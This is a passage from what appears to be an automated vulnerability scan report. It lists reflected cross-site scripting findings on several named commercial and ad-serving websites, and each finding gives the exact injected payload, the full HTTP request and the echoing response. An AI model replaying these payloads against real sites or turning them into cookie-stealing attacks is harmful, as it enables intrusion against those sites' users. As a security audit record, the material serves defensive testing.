GET /adiframe/3.0/5330.1/1959687/0/225f2931"><script>alert(1)</script>55800ca2451/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225f2931"><script>alert(1)</script>55800ca2451/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.6. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b9b4"><script>alert(1)</script>ed9624c5b60 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH6b9b4"><script>alert(1)</script>ed9624c5b60;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH6b9b4"><script>alert(1)</script>ed9624c5b60;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.7. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48be4"><script>alert(1)</script>b94f62885a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]&48be4"><script>alert(1)</script>b94f62885a9=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 288

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]&48be4"><script>alert(1)</script>b94f62885a9=1;adiframe=y">
...[SNIP]...

3.8. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62e7"><script>alert(1)</script>2ee57e1ea08 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]f62e7"><script>alert(1)</script>2ee57e1ea08 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]f62e7"><script>alert(1)</script>2ee57e1ea08;adiframe=y">
...[SNIP]...

3.9. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a9a66><script>alert(1)</script>e3dd50b670a was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=a9a66><script>alert(1)</script>e3dd50b670a HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=a9a66><script>alert(1)</script>e3dd50b670a><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH;target=
...[SNIP]...

3.10. http://buy.travelguard.com/tgi2/pct/default.aspx [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/pct/default.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d513'%3balert(1)//05c09b48c56 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as 9d513';alert(1)//05c09b48c56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/pct/default.aspx?_TSM_HiddenField_=ctl00_ctl00_purchasePathContainer_scriptManager_HiddenField9d513'%3balert(1)//05c09b48c56&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.10920.32880%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3a816bbca1-959d-46fd-928f-6347d6f2c9c3%3ae2e86ef9%3aa9a7729d%3a9ea3f0e2%3a9e8e87e9%3a1df13a87%3a4c9865be%3aba594826%3a507fcf1b%3ac7a4182e%3a182913ba%3abae32fb7 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://buy.travelguard.com/tgi2/pct/default.aspx?br=tgdirect&pc=PCTDS-GMP&intcmp=clc-001-WYWICust-Stkd-Top-B1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1475064262442%3B%20gpv_pageName%3Dus_direct%253A/MVT_Redirect/%7C1317386062687%3B%20s_depth%3D2%7C1317386062691%3B%20s_pers_prop21%3D000329%7C1475064262766%3B; s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-WYWICust-Stkd-Top-B1%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:07:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Sat, 29 Sep 2012 12:07:43 GMT
Last-Modified: Mon, 11 Jul 2011 17:25:19 GMT
Content-Type: application/x-javascript
Content-Length: 272825

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
MaskedEdit.MaskedEditBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_ctl00_purchasePathContainer_scriptManager_HiddenField9d513';alert(1)//05c09b48c56').value += ';;AjaxControlToolkit, Version=1.0.10920.32880, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:816bbca1-959d-46fd-928f-6347d6f2c9c3:e2e86ef9:a9a7729d:9ea3f0e2:9e8e87e9:1df13a87:4c98
...[SNIP]...

3.11. http://buy.travelguard.com/tgi2/pct/default.aspx [br parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/pct/default.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ca8'%3balert(1)//8ccd711ec0c was submitted in the br parameter. This input was echoed as 39ca8';alert(1)//8ccd711ec0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/pct/default.aspx?br=tgdirect39ca8'%3balert(1)//8ccd711ec0c&pc=PCTDS-GMP&intcmp=clc-001-WYWICust-Stkd-Top-B1 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelguard.com/MVT_Redirect/?br=tgdirect&pc=PCTDS-GMP&intcmp=clc-001-WYWICust-Stkd-Top-B1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1475064262442%3B%20gpv_pageName%3Dus_direct%253A/MVT_Redirect/%7C1317386062687%3B%20s_depth%3D2%7C1317386062691%3B%20s_pers_prop21%3D000329%7C1475064262766%3B; s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-WYWICust-Stkd-Top-B1%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:10:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 96131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   PCT Trip Details
</title><link h
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect39ca8';alert(1)//8ccd711ec0c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.12. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5b813--><script>alert(1)</script>42354065ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss+desktop+se/5b813--><script>alert(1)</script>42354065ffbrver HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:52 GMT
Vary: Accept-Encoding
Content-Length: 13609
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
<input type="text" name="q" value="xss desktop se/5b813--><script>alert(1)</script>42354065ffbrver" />
...[SNIP]...

3.13. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908aa</script><script>alert(1)</script>fcdc7750642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=xss+desktop+se/908aa</script><script>alert(1)</script>fcdc7750642rver HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:48 GMT
Vary: Accept-Encoding
Content-Length: 13621
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
ormRoot('cse-search-form');
                                       options.setAutoComplete(true);
                                       
                                       customSearchControl.draw('cse', options);
                                                                                   customSearchControl.execute('xss desktop se/908aa</script><script>alert(1)</script>fcdc7750642rver');
                                                                           }, true);
                               </script>
...[SNIP]...

3.14. http://computerrentals.com/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a5c6</script><script>alert(1)</script>8e5b253ccc9 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=xss+desktop+server5a5c6</script><script>alert(1)</script>8e5b253ccc9 HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:29 GMT
Vary: Accept-Encoding
Content-Length: 13619
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
Root('cse-search-form');
                                       options.setAutoComplete(true);
                                       
                                       customSearchControl.draw('cse', options);
                                                                                   customSearchControl.execute('xss desktop server5a5c6</script><script>alert(1)</script>8e5b253ccc9');
                                                                           }, true);
                               </script>
...[SNIP]...

3.15. http://computerrentals.com/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into an HTML comment. The payload 3f8c1--><script>alert(1)</script>74fb586f5cd was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss+desktop+server3f8c1--><script>alert(1)</script>74fb586f5cd HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:33 GMT
Vary: Accept-Encoding
Content-Length: 13607
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
<input type="text" name="q" value="xss desktop server3f8c1--><script>alert(1)</script>74fb586f5cd" />
...[SNIP]...

3.16. http://dms.netmng.com/si/cm/tracking/si/CM/Tracking/ClickTracking.aspx [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/cm/tracking/si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d54'%3balert(1)//1f2bc4e80a5 was submitted in the u parameter. This input was echoed as 69d54';alert(1)//1f2bc4e80a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/cm/tracking/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1&u=69d54'%3balert(1)//1f2bc4e80a5 HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.travelguard.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:05:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 739
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != '' ||sipageurl.search(/sisearchengine=/i)>=0 ){ if((sipageurl.split('/')[2] != sirefurl.split('/')[2])){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=0&u=69d54';alert(1)//1f2bc4e80a5';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

3.17. http://e.targetfuel.com/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://e.targetfuel.com
Path:   /

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 20e21<script>alert(1)</script>7f372d558b5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?sid=c4efaaaa-166e-4641-8342-a5d43008a6da&url=http%3A%2F%2Fwww.homedepot.ca%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FHome%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&rurl=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&callback=jQuery15107517646802589297_131738416077120e21<script>alert(1)</script>7f372d558b5&pv%5Bpv%5D=1&pc%5Bpc%5D=1&_=1317384160773 HTTP/1.1
Host: e.targetfuel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 30 Sep 2011 12:03:26 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Server: Apache/2.2.20 (Amazon)
Set-Cookie: xs-c4efaaaa-166e-4641-8342-a5d43008a6da-vid=2609eeb2-4c35-4649-9eea-d330adc4f7ff; path=/; domain=.targetfuel.com
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
Content-Length: 134
Connection: keep-alive


jQuery15107517646802589297_131738416077120e21<script>alert(1)</script>7f372d558b5({vid: "2609eeb2-4c35-4649-9eea-d330adc4f7ff"})

3.18. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fingerhut.tt.omtrdc.net
Path:   /m2/fingerhut/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e76be<script>alert(1)</script>a0d7c65495 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1317385467182-654123&mboxPage=1317385467182-654123&screenHeight=1200&screenWidth=1920&browserWidth=1083&browserHeight=877&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=FHTOCP_welcomee76be<script>alert(1)</script>a0d7c65495&mboxId=0&mboxTime=1317367467591&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 209
Date: Fri, 30 Sep 2011 12:25:18 GMT
Server: Test & Target

mboxFactories.get('default').get('FHTOCP_welcomee76be<script>alert(1)</script>a0d7c65495',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317385467182-654123.19");

3.19. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/AC_close_052110

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de589<img%20src%3da%20onerror%3dalert(1)>0d8ae2ced7c was submitted in the REST URL parameter 4. This input was echoed as de589<img src=a onerror=alert(1)>0d8ae2ced7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/AC_close_052110de589<img%20src%3da%20onerror%3dalert(1)>0d8ae2ced7c?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
